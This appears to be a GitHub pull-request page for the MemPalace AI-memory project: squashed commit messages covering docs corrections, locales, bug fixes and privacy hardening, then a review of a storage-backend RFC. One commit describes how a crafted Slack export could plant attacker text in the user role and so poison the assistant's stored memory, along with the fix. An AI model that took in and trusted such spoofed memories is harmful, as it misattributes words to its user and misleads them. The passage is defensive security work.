- Replace the MemPalace-vs-Zep feature matrix with a short "related work" note that links to Zep's own documentation for authoritative details on their deployment model. Avoids claims we cannot verify at source.

* docs: #875 follow-up — repo surfaces + reproduction URLs + CHANGELOG
Remaining in-repo surfaces carrying the same retracted or broken claims as the public pages fixed in the previous two commits.
CONTRIBUTING.md
- "Palace structure matters ... 34% retrieval improvement" → reframed as scoping (same rewording applied to the website equivalents).
benchmarks/BENCHMARKS.md
- Add a prominent "Important caveat" block at the top of the "Comparison vs Published Systems" table explaining that R@5 (retrieval recall) and QA accuracy are different metrics, with citations to Mastra, Mem0, and Supermemory's own published methodology pages. Annotate the specific competitor rows whose numbers are QA accuracy, not retrieval recall.
- Annotate the `hybrid v4 + rerank 100%` row to note that the 99.4 → 100 step was tuned on 3 specific wrong answers (already disclosed further down in the doc under "Benchmark Integrity"); the honest hybrid figure is held-out 98.4%.
- Fix the broken clone URL — `aya-thekeeper/mempal` no longer points at anything; now `MemPalace/mempalace`.
benchmarks/README.md + benchmarks/HYBRID_MODE.md
- Same clone-URL fix applied.
CHANGELOG.md
- Add a ### Documentation entry under [Unreleased] v3.3.0 that names #875 and summarises the scope of the rewrite.

* docs+tests: fix CI after README slim (#875)
The regression-guard tests added in #835 were pinned to the old README shape (tool table + file-reference table). When #897 slimmed the README and moved that content to the website, three tests started failing:
TestReadmeToolsExistInCode.test_every_readme_tool_exists_in_tools_dict
TestNoUnlistedTools.test_no_undocumented_tools
TestReadmeDialectNotLossless.test_readme_dialect_line_not_lossless
Changes in this commit:
1. Update the 3 tests to track the new canonical docs surfaces
- Tool list -> website/reference/mcp-tools.md (tests parse `### \`mempalace_xxx\`` headings instead of markdown table rows).
- dialect.py lossless disclaimer -> website/reference/modules.md (any line mentioning dialect.py must not also say "lossless").
2. Fix the website to make "no undocumented tools" true
Add the 10 tools that existed in TOOLS but were missing from website/reference/mcp-tools.md (create_tunnel, delete_tunnel, follow_tunnels, list_tunnels, get_drawer, list_drawers, update_drawer, hook_settings, memories_filed_away, reconnect). Page header now correctly says "all 29 MCP tools".
3. Align pre-commit ruff pin to match CI (0.4.x)
.pre-commit-config.yaml was pinning ruff v0.9.0, while .github/workflows/ci.yml installs ruff>=0.4.0,<0.5. The two formatters produce incompatible output (e.g. v0.9.0 reformats `assert (x), msg` -> `assert x, (msg)` in a way v0.4.x rejects), which would cause the pre-commit hook to modify files that CI then flags as unformatted. Pinning the hook to v0.4.10 keeps the dev loop and CI in lock-step.
Full suite: 887 passed, 0 failed.

* fix: address i18n review issues from PR #718
Three issues flagged by bensig on the i18n PR before merge:
1. ko.json: status_drawers used {drawers} instead of {count}, causing the Korean UI to show the raw template string instead of the actual drawer count. All other 7 languages use {count}.
2. Test file was shipped inside the package at mempalace/i18n/test_i18n.py with a sys.path.insert hack. Moved to tests/test_i18n.py per the project convention in AGENTS.md.
3. Dialect.from_config() passed lang=config.get("lang") which defaults to None, causing __init__ to inherit whatever language was loaded earlier via module-level state. Now defaults to "en" explicitly so from_config is deterministic regardless of prior load_lang() calls.
Added two regression tests for the ko.json fix and the state leak.

* docs(cli): clarify that 'mempalace init' requires <dir> (#210) (#862)
Fixes #210. The CLI requires a positional <dir> argument. Previous docs emphasized that init 'sets up ~/.mempalace/' which misled users into expecting no arguments. Now the docs show <dir> is required, offer '.' as the usage for the current directory, and reword the description so the project-directory scan is listed first.

* fix: make entity_registry.research() local-only by default (#811)

* fix: make entity_registry.research() local-only by default
research() previously called _wikipedia_lookup() unconditionally, sending entity names to en.wikipedia.org on every uncached lookup. This violates the project's local-first and privacy-by-architecture principles documented in CLAUDE.md.
Changes:
- research() now returns "unknown" for uncached words by default
- New allow_network=True parameter required for Wikipedia lookups
- Wikipedia 404 now returns "unknown" instead of asserting "person" with 0.70 confidence, preventing entity registry poisoning
- Added privacy warning docstring to _wikipedia_lookup()
- Added tests for local-only default, opt-in network, 404 handling, and cache-not-persisted-on-local-only behaviour
Refs: MemPalace/mempalace#809

* fix: improve research() cache read path and deduplicate test mocks
- Use .get() instead of .setdefault() for cache reads in research() so the local-only path never mutates _data unnecessarily
- Move .setdefault() to the network-write path only
- Use result.setdefault() for word/confirmed keys to ensure consistent return shape across all _wikipedia_lookup error paths
- Extract duplicated mock_result dict into _MOCK_SAOIRSE_PERSON constant shared by 3 test functions

* fix: return empty status instead of error on cold-start palace (#830) (#831)
tool_status() called _get_collection() with the default create=False, which throws when the ChromaDB collection does not exist yet (valid palace, zero drawers). The exception was swallowed and status returned "No palace found" even though init had completed successfully. Switching to create=True bootstraps an empty collection on first status call, matching what the write path already does. Fix suggested by @hkevinchu in the issue.

* fix(searcher): guard against empty ChromaDB query results (#195) (#865)
Fixes #195. When ChromaDB returns no documents (empty palace, or wing/room filter that excludes everything), it returns the shape: {"documents": [], "metadatas": [], "distances": []}
Indexing `results["documents"][0]` blindly raises IndexError instead of the expected 'no results' response. Affected: searcher.search(), searcher.search_memories() (drawer + closet branches plus the total_before_filter aggregate), and Layer3.search() / Layer3.search_raw().
Adds a tiny private helper `searcher._first_or_empty(results, key)` that safely extracts the inner list, returning [] for any of: missing key, empty outer list, [None], or [[]]. layers.py imports the same helper to avoid duplicating the guard.
Tests: tests/test_empty_chromadb_results.py covers all observed shapes plus a documentation-style test that pins the original IndexError so future readers understand why the helper exists.

* fix(init): auto-add per-project files to .gitignore in git repos (#185) (#866)
Partially addresses #185. `mempalace init <dir>` writes `mempalace.yaml` and `entities.json` into the project root. When <dir> is a git repository, those files have no default protection and risk being committed by accident — the loudest concern in the original report.
This PR adds `_ensure_mempalace_files_gitignored()` which runs at the end of cmd_init: if <dir>/.git exists, append the two filenames to .gitignore (creating it if necessary) under a clearly-marked block. The helper is conservative:
- only runs when <dir>/.git is present (no-op for non-git projects)
- skips entries already present (no duplicates)
- preserves existing .gitignore content
- handles files without trailing newlines
This does NOT relocate the files to ~/.mempalace/wings/<wing>/ as the issue's 'Expected' section proposes — that's a behavioral change with miner/config implications and warrants a separate design discussion. The gitignore safeguard removes the immediate risk without breaking any existing flow.
Tests: 5 cases in tests/test_init_gitignore_protection.py covering no-op, fresh creation, partial append, idempotency, and missing-newline edge case.

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225) (#864)

* fix(mcp): redirect stdout to stderr during import to protect JSON-RPC channel (#225)
Fixes #225. Several transitive dependencies (chromadb, onnxruntime, posthog) print banners and warnings to stdout — sometimes at the C level — during the mcp_server import chain. Because the MCP protocol multiplexes JSON-RPC over stdio, any non-JSON output on stdout corrupted the message stream and broke Claude Desktop's parser with errors like:
MCP mempalace: Unexpected token '*', "**********"... is not valid JSON
MCP mempalace: Unexpected token 'E', "EP Error D"... is not valid JSON
MCP mempalace: Unexpected token 'F', "Falling ba"... is not valid JSON
Reproduced on Windows 11 with mempalace 3.0.0 / Python 3.10 / Claude Desktop 1.1062.0.
Fix: at module load, redirect stdout to stderr at both the Python level (sys.stdout = sys.stderr) and the file-descriptor level (os.dup2(2, 1)) to catch C-level prints, while preserving the real stdout for later restore. main() calls _restore_stdout() right before entering the protocol loop so JSON-RPC responses still go to the real stdout.
Adds tests/test_mcp_stdio_protection.py with three regression tests:
- module-level redirect is in place after import
- _restore_stdout() restores the original stdout (idempotent)
- 'python -m mempalace.mcp_server' with empty stdin emits no stdout

* style: reformat with ruff 0.4 (CI version) for #225

* fix(hooks): stop precompact hook from blocking compaction (#856, #858) (#863)

* fix(hooks): stop precompact hook from blocking compaction
The precompact hook unconditionally returned {"decision": "block"}, which in Claude Code means "cancel compaction" with no retry mechanism. This made /compact permanently broken for all plugin users.
Changed hook_precompact() to mine the transcript synchronously (so data lands before compaction) and return {"decision": "allow"}. This matches the standalone bash hook in hooks/ which already uses allow. Also extracted _get_mine_dir() and _mine_sync() helpers so precompact can mine from the transcript directory, not just MEMPAL_DIR.
Stop hook behavior is unchanged -- left for #673 which implements the full silent save path.
Closes #856, closes #858.

* fix: use empty JSON instead of invalid "allow" decision value
Claude Code only recognizes "block" as a top-level decision value. "allow" is a permissionDecision value for PreToolUse hooks, not a valid top-level decision. The correct way to not block is to return empty JSON. Caught by #872.

* feat: include created_at timestamp in search results (#846)

* feat: include created_at timestamp in search results (closes #465)
Surface the existing filed_at metadata as created_at in search result objects returned by search_memories(). Enables temporal reasoning over search hits without additional queries.

* Feat: add fallback for missing filed_at metadata

* fix: add provenance header and speaker IDs to Slack transcript imports (#815)

* fix: add provenance header and speaker IDs to Slack transcript imports
Slack exports are multi-party chats where no speaker is inherently the "user" or "assistant".
The parser previously assigned these roles purely by position, allowing a crafted export to place attacker text in the "user" role — making it appear as the memory owner's words in all future retrieval (data poisoning via stored memory).
Changes:
- Add provenance header marking Slack transcripts as multi-party with positional (unverified) role assignment
- Prefix each message with the original speaker ID ([U1], [U2], etc.) so downstream consumers can distinguish authors
- Keep user/assistant role alternation for exchange-pair chunking compatibility with convo_miner.py
Tests:
- Provenance header presence and content
- Speaker ID preservation in output
- Attacker-first-message attribution verification
Refs: MemPalace/mempalace#809

* fix: move Slack provenance to footer, sanitize speaker IDs, extract constant
- Move provenance notice from header to footer to prevent it becoming a standalone ChromaDB drawer via paragraph chunking on exports with fewer than 3 exchange pairs (violates verbatim-always principle)
- Sanitize speaker user_id/username: strip brackets, newlines, and control characters to prevent chunk-boundary injection via crafted Slack exports
- Extract header string to _SLACK_PROVENANCE_FOOTER module constant, consistent with _TOOL_RESULT_* constants pattern; tests import it instead of duplicating the literal
Refs: MemPalace/mempalace#809

* fix: restrict file permissions on sensitive palace data (#814)

* fix: restrict file permissions on sensitive palace data
On Linux with default umask (022), several files and directories containing personal data were created world-readable. This patch applies chmod 0o700 to directories and 0o600 to files immediately after creation, wrapped in try/except for Windows compatibility.
Files hardened:
- hooks_cli.py: hook_state/ directory and hook.log
- entity_registry.py: entity_registry.json (names, relationships)
- knowledge_graph.py: knowledge_graph.sqlite3 parent directory
- exporter.py: export output directory and wing subdirectories
- config.py: people_map.json (name mappings)
- mcp_server.py: WAL file creation uses atomic os.open (TOCTOU fix)
Refs: MemPalace/mempalace#809

* fix: avoid redundant chmod calls on hot paths
- hooks_cli.py: chmod STATE_DIR and hook.log only on first creation, not on every _log() call (hooks fire on every Stop event)
- exporter.py: track created wing dirs to skip redundant makedirs + chmod on the same directory across batches
- mcp_server.py: remove redundant _WAL_FILE.chmod after os.open already set mode=0o600 atomically
Refs: MemPalace/mempalace#809

* test: add palace_graph tunnel helper coverage
Adds focused tests for explicit tunnel helpers in `mempalace/palace_graph.py`. Covered:
- `_load_tunnels`
- `_save_tunnels`
- `create_tunnel`
- `list_tunnels`
- `delete_tunnel`
- `follow_tunnels`

* refactor(entity_detector): make multi-language extensible via i18n JSON
Move all entity-detection lexical patterns (person verbs, pronouns, dialogue markers, project verbs, stopwords, candidate character class) out of hardcoded module-level constants and into the entity section of each locale's JSON in mempalace/i18n/. Adds a languages parameter to every public function so callers union patterns across the desired locales. The default stays ("en",), so all existing callers and tests behave unchanged.
Also adds:
- get_entity_patterns(langs) helper in mempalace/i18n/ that merges patterns across requested languages, dedupes lists, unions stopwords, and falls back to English for unknown locales
- MempalaceConfig.entity_languages property + setter, with env var override (MEMPALACE_ENTITY_LANGUAGES, comma-separated)
- mempalace init --lang en,pt-br flag (persists to config.json)
- Per-language candidate_pattern so non-Latin scripts (Cyrillic, Devanagari, CJK) can register their own character classes instead of being silently dropped by the ASCII-only [A-Z][a-z]+ default
- _build_patterns LRU cache keyed by (name, languages) so multi-language callers don't poison each other's cache slots
Why now: the open language PRs (#760 ru, #773 hi, #778 id, #907 it) only add CLI strings via mempalace/i18n/. PR #156 (pt-br) is the first that needed entity_detector changes and inlined a _PTBR variant of every constant. That doesn't scale past 2-3 languages — every text gets checked against every language's patterns regardless of relevance, and candidate extraction still drops accented and non-Latin names. This PR sets the standard so future locale contributors only edit one JSON file (no Python changes), and entity detection scales linearly with how many languages a user actually enabled, not how many ship.

* test: document orphan-locale recovery for _temp_locale helper

* feat: add Russian language support to i18n module
Add ru.json with full Russian translations for CLI strings, palace terminology, AAAK compression instruction, and regex patterns for topic/action extraction with Cyrillic character classes. No code changes needed -- the i18n module auto-discovers language files via *.json glob in the i18n directory.

* feat(i18n): add entity detection section to Russian locale
Cyrillic candidate/multi-word patterns, person-verb patterns (сказал, спросил, ответил, etc.), pronoun patterns, dialogue markers, direct address, and Russian stopwords. Follows the i18n entity framework from #911.

* fix(i18n): apply review feedback on ru.json (#760)
- mine_skip: "повторной раскопки" -> "повторной обработки"
- quote_pattern: add Russian guillemet quotes «»
Co-Authored-By: almirus <[email protected]>

* feat(i18n): expand Russian entity stopwords with prepositions and conjunctions
Adds 34 prepositions and conjunctions to reduce false positives in entity detection when these words appear sentence-initial.
Co-Authored-By: almirus <[email protected]>

* feat: add italian i18n support

* feat: add italian entity patterns

* Updated hi.json to support infra for entity, pronoun_patterns, dialogue_patterns, direct_address_pattern, project_verb_patterns and stopwords

* feat(i18n): add Brazilian Portuguese locale with entity detection (closes #117)
CLI strings, AAAK instruction, regex patterns, and entity section with person-verb, pronoun, dialogue, and candidate patterns for Latin+diacritics names (Joao, Ines, Angela). Follows the i18n entity framework from #911.

* fix(i18n): address review feedback on pt-br.json
- dialogue_patterns[0]: remove stray \" before > (fixes markdown quote matching)
- entity stopwords: add 40 prepositions, conjunctions, and common words to reduce false positives
- pronoun_patterns: add 2nd-person (você/vocês) and possessives (seu/sua/seus/suas)

* feat(cli): add version display and version flag to CLI
Introduces a version label to the command-line interface, displaying the current MemPalace version in the help text. Adds a `--version` flag to allow users to easily check the version and exit.
* fix(i18n): resolve language codes case-insensitively (#927)
BCP 47 language tags are case-insensitive (RFC 5646 §2.1.1) but the locale files mix conventions (pt-br.json vs zh-CN.json). On case-sensitive filesystems, '--lang PT-BR' or '--lang zh-cn' silently missed the file, _load_entity_section returned {}, and entity detection ran in English with no warning. The cache key in get_entity_patterns was built from raw input, so ('PT-BR',) and ('pt-br',) produced two distinct entries, both wrong.
Add _canonical_lang(lang) that resolves any casing to the on-disk filename stem via lowercase comparison, and route load_lang, _load_entity_section, and the cache key through it.
Closes #927

* fix(i18n): use Optional[str] for Python 3.9 compatibility
PEP 604 union syntax (str | None) requires Python 3.10+. The project supports 3.9 per CI matrix, so use typing.Optional instead.

* fix(entity_detector): script-aware word boundaries for combining-mark scripts
Python's \b is a \w/non-\w transition. Devanagari vowel signs (matras) like ा ी ु are Unicode category Mc (Mark, Spacing Combining) — not \w. This means \b splits mid-word on every matra: names like अनीता (Anita) truncate to अनीत, and person-verb patterns like \bराज\s+ने\s+कहा\b never match because \b fails after the final matra of कहा. Same issue affects Arabic, Hebrew, Thai, Tamil, and every other script whose words contain combining marks.
Fix: locales with combining-mark scripts declare a boundary_chars field in their entity section (e.g. "\\w\\u0900-\\u097F" for Hindi). The i18n loader replaces every \b in that locale's patterns with a script-aware lookaround that treats the declared characters as "inside-word", and pre-wraps candidate/multi_word patterns with the same boundary. Default behavior (no boundary_chars) keeps standard \b — en, pt-br, ru, it are unchanged.
Changes:
- mempalace/i18n/__init__…
jphein
left a comment
Follow-up review after the 2026-04-13 round + @bensig's approval. Most of my earlier concerns are addressed; one new empirical observation worth flagging.
Closed from my prior review
- §1.5 read-heavy edge case (palace stays `unknown` indefinitely if it rarely writes) — closed by the explicit `mempalace palace set-embedder --model NAME` CLI in the three-state table at line 192. Operators of read-heavy palaces have a path that doesn't require waiting for a stale write to trigger identity resolution. ✓
- §7.4 UUID5 namespace — bensig's block is still mechanical (placeholder `TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME`); no opinion from this side on the value, just confirming it's the only remaining gate.
Still open from my prior review (no new info needed, just a note)
- §1.3 typed-results migration — RFC currently doesn't sketch a `.to_dict()` compat shim on `QueryResult`/`GetResult` (one possible shape is sketched below). Forks and downstream consumers with code touching `mcp_server.py` or `searcher.py` that assume dict returns will need real edits, not no-op wrappers. The cleanup PR mentioned in §10 is the right place to land it; just naming the question now so it isn't a surprise during that PR's review.
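A minimal sketch of the kind of shim this item asks about, assuming field names for the typed results that the RFC has not fixed yet; the Chroma-style keys are the dict shape today's dict-indexing callers expect.

```python
# Hypothetical compat shim, not RFC text: the field names and the exact dict
# keys are assumptions about what a lossless dict view could look like.
from dataclasses import dataclass
from typing import Any, Dict, List, Optional


@dataclass
class QueryResult:
    ids: List[List[str]]
    documents: List[List[str]]
    metadatas: List[List[Dict[str, Any]]]
    distances: List[List[float]]
    embeddings: Optional[List[List[List[float]]]] = None

    def to_dict(self) -> Dict[str, Any]:
        # Chroma-shaped view so dict-indexing call sites in mcp_server.py /
        # searcher.py keep working until they migrate to the typed API.
        return {
            "ids": self.ids,
            "documents": self.documents,
            "metadatas": self.metadatas,
            "distances": self.distances,
            "embeddings": self.embeddings,
        }
```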
New: per-palace multi-collection isn't in the spec
The fork shipped a structural fix this week that's adjacent to RFC 001 in an interesting way. Cat 9 A/B benchmark on a 151K-drawer canonical palace surfaced that Stop-hook auto-save checkpoints (short, query-term-saturated) dominate vector top-N — kind=all returned 632 tokens/Q of mostly-checkpoint word-soup; kind=content (post-filter) returned 3 because over-fetch=100 wasn't enough. Recall was 0.984 R@5; E2E quality collapsed.
The fix promoted the architecture from "filter at query time" to "split at storage time": move checkpoints to a dedicated mempalace_session_recovery ChromaDB collection (same client, same palace, separate index), with a new mempalace_session_recovery_read MCP tool reading by session_id / agent / since-until. Implementation: palace.py gained _SESSION_RECOVERY_COLLECTION + get_session_recovery_collection(palace_path) mirroring get_collection(palace_path, collection_name="mempalace_drawers", create=...). Palace-daemon's lifespan runs migrate_checkpoints_to_recovery() on startup so existing palaces auto-migrate.
This works on the current BaseBackend / BaseCollection API — get_collection(palace, collection_name=...) is already keyed by collection_name, so adding a sibling collection per palace is just calling it with a different name. The design fell out of the existing seam.
Question for the spec: is "multiple collections per palace, by purpose" intentionally implicit in the API, or worth one sentence in §2.5 / §3.1? Reading the RFC, "palace" feels like the unit (1:1 with a collection); but production needed >1 collection per palace for the verbatim-vs-derivative split. Backends like Postgres (#665) and Qdrant (#700) handle this trivially via schema/collection naming, but a future backend that assumes 1:1 — or a backend author reading the spec — might design themselves into a corner. A "backends MUST support N collections per palace, keyed by collection_name arg" line would close the gap without changing any signatures.
(Spec at §1.6 calls out "many palaces" but not "many collections per palace." Adjacent but distinct.)
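For concreteness, a rough sketch of the pattern described above, assuming the `palace.py` signatures quoted in this comment and a kwargs-only `add()`; none of it is normative spec text.

```python
# Sketch of "N collections per palace, keyed by collection_name".
# Import path and signatures are assumptions taken from this thread, not the RFC.
from mempalace.palace import get_collection


def split_storage(palace_path: str) -> None:
    drawers = get_collection(palace_path, collection_name="mempalace_drawers", create=True)
    recovery = get_collection(palace_path, collection_name="mempalace_session_recovery", create=True)

    # Verbatim memories and derivative checkpoints live in sibling collections of
    # the same palace, so checkpoint word-soup cannot dominate drawer top-N.
    drawers.add(ids=["d-1"], documents=["..."], metadatas=[{"wing": "projects"}])
    recovery.add(ids=["c-1"], documents=["checkpoint ..."], metadatas=[{"session_id": "s-42"}])
```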
Rest of the spec
Read clean. §10's flagging of mcp_server._get_client() cache + reconnect for migration-into-ChromaBackend is exactly right — that #757 work is Chroma-specific and shouldn't live in mcp_server. §11's PR-impact table accurately reflects the in-flight backends; nothing missing from this side.
Net: ready to merge after UUID5 and (if desired) the multi-collection sentence.
Following up on Q1 from my 2026-04-15 comment — re-stating it concretely now that approval is close, since this is the one item I'd like pinned in the spec rather than left to implementations. §4.4 currently reads as naming-only ("the backend uses it as given"). Suggest one MUST clause:
Without this, hosted multi-tenant deployments can't cite RFC 001 as the basis for tenant isolation, and the contract becomes unenforceable across plugins from different authors.
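Purely as illustration, one shape the isolation guarantee could take if expressed as a conformance-suite check; `make_backend`, the import path, and the empty-result assertion are all assumptions, not proposed RFC wording.

```python
# Hypothetical conformance check, not RFC text: a drawer written under one
# PalaceRef namespace must never be readable through another namespace.
from mempalace.backends.base import PalaceRef  # import path assumed


def test_namespace_isolation(make_backend):
    backend = make_backend()
    tenant_a = backend.get_collection(
        PalaceRef(id="palace-1", namespace="tenant-a"),
        collection_name="mempalace_drawers", create=True)
    tenant_b = backend.get_collection(
        PalaceRef(id="palace-1", namespace="tenant-b"),
        collection_name="mempalace_drawers", create=True)

    tenant_a.add(ids=["d1"], documents=["tenant-a private note"], metadatas=[{"wing": "w"}])

    # Same palace id, different namespace: nothing leaks across the boundary.
    assert tenant_b.get(ids=["d1"]).documents == []
```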
Summary
Backends ship as `pip install mempalace-<name>` packages that drop into core without patches.

Tracking issue: #737 (see discussion and follow-up comments for the design rationale).
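A sketch of what "drop into core without patches" means mechanically, using the `mempalace.backends` entry-point group named under the key decisions below; the loader function and return shape are illustrative, not code from the RFC.

```python
# Illustrative only: how core could enumerate installed mempalace-<name> backends.
from importlib.metadata import entry_points


def discover_backends() -> dict:
    eps = entry_points()
    # Python 3.10+ exposes .select(); the 3.9 fallback indexes the group dict.
    if hasattr(eps, "select"):
        group = eps.select(group="mempalace.backends")
    else:
        group = eps.get("mempalace.backends", [])
    return {ep.name: ep.load() for ep in group}
```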
Key decisions in the draft
- Backend discovery via entry points under `mempalace.backends`; `pip install` is sufficient to add a backend.
- Typed `QueryResult`/`GetResult` dataclasses replace Chroma's dict shape from day one. `ChromaCollection` gets a thin adapter.
- `PalaceRef(id, local_path?, namespace?)` replaces `palace_path: str`. Backend instances are long-lived and multi-palace; thread-safe across palaces.
- Required filter operators: `$eq`, `$ne`, `$in`, `$nin`, `$and`, `$or`, `$contains`; unknown operators MUST raise `UnsupportedFilterError` (silent drop forbidden; a sketch follows this list).
- Backends check the embedder's `model_name` and raise `EmbedderIdentityMismatchError` on swap (not just dimension).
- Capability tokens use `supports_*` naming, free-form strings, extensible by third parties.
- `AbstractBackendContractSuite` pytest mixin + optional parametrized run of the core suite across all backends under `MEMPALACE_TEST_ALL_BACKENDS=1`.
- `maintenance_state()` / `run_maintenance(kind)`; published numbers must cover three phases (post-load, post-native-maintenance, post-explicit-maintenance).
- `mempalace migrate` + `mempalace verify` operating through `BaseCollection` only — no per-backend migration code.
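To make the filter requirement concrete, here is the sketch referenced in the operator bullet above; only the operator set and the must-raise rule come from the draft, while the `query()` keyword names follow a Chroma-style call shape and are assumptions.

```python
# Sketch of the required filter subset and its mandatory failure mode.
# `collection` stands in for any RFC 001 collection; the exception import path
# and the query() parameter names are assumed, not quoted from the spec.
from mempalace.backends.base import UnsupportedFilterError


def scoped_search(collection):
    where = {"$and": [
        {"wing": {"$eq": "projects"}},
        {"room": {"$nin": ["archive", "trash"]}},
    ]}
    hits = collection.query(
        query_texts=["postgres migration plan"],
        where=where,
        where_document={"$contains": "RFC 001"},
        n_results=5,
    )

    # Unknown operators must fail loudly; silently dropping them is forbidden.
    try:
        collection.query(query_texts=["x"], where={"wing": {"$regex": "proj.*"}}, n_results=5)
    except UnsupportedFilterError:
        pass
    return hits
```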
Impact on in-flight PRs

Each of #574, #643, #665, #697, #700, #381 is called out in §11 with the specific alignment work required — #574 is closest to the final shape, #697's `collection_prefix` concern dissolves into `PalaceRef.namespace`, #700 and #381 need the canonical UUID5 namespace.
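A hedged sketch of why the canonical UUID5 namespace matters for #700 and #381: deterministic drawer ids that agree across backends. The derivation scheme and the placeholder value are illustrative; the real `NAMESPACE_MEMPALACE` is still the §7.4 to-be-assigned constant.

```python
import uuid

# Placeholder only; §7.4 marks the real value TO-BE-ASSIGNED-ONCE-FOR-ALL-TIME.
NAMESPACE_MEMPALACE = uuid.UUID("00000000-0000-0000-0000-000000000000")


def drawer_id(palace_id: str, document: str) -> str:
    # Hypothetical derivation: with one shared namespace, the same palace and the
    # same verbatim text map to the same id on every backend, which lets a
    # backend-neutral migrate/verify pass compare collections directly.
    return str(uuid.uuid5(NAMESPACE_MEMPALACE, f"{palace_id}:{document}"))
```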
Seven files still import
chromadbdirectly (repair.py,dedup.py,cli.py×2,mcp_server.py,migrate.py, plus an instructions doc). Combined with the dict-to-typed-result migration, this needs its own PR landing before the spec can be enforced. Called out in §10.Test plan
changes_sincefilter, per-palace capability query,run_maintenancereturn shape)NAMESPACE_MEMPALACEUUID assigned (§7.4)AbstractBackendContractSuite+ entry-point discovery +PalaceRouter+PalaceRef